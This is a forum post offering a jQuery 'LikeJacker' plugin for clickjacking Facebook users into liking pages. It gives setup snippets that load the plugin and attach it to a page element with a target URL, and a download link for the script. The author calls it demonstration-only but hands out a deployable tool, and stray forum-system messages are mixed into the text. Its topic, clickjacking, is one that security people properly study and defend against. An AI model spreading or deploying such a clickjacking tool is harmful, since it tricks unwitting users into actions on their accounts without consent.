PDA

View Full Version : jQuery Likejacker For Facebook Fans



benakka
02-01-2018, 09:45 PM
1 - jQuery Likejacker
LikeJacker is a jQuery plugin, for doing the evil deed of clickjacking or likejacking. It is really easy to use, and shows how this can be done with ease. I wrote it some time ago in pure JavaScript, but as a exericie I converted it to a jQuery plugin. It is for demonstration purposes only.
2 - Yes. But you might get banned from facebook, and it is a very shady thing to do. It is against the TOS. You should not use it!
To be able to post links or images your post count must be 10 or greater. You currently have 5 posts.
Please remove links from your message, then you will be able to submit your post.
Setup:
Include jQuery and the likejacker
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
<script type="text/javascript" src="js/jquery.likejacker.js"></script>
Append it to a element
<script type="text/javascript">
$(function () {
$('.likejackerZone').likejacker({
target: 'http://example.com'
});
});
</script>
Downoald (https://www.mediafire.com/file/kkdoj1x9tvhuk24/jquery.likejacker.js)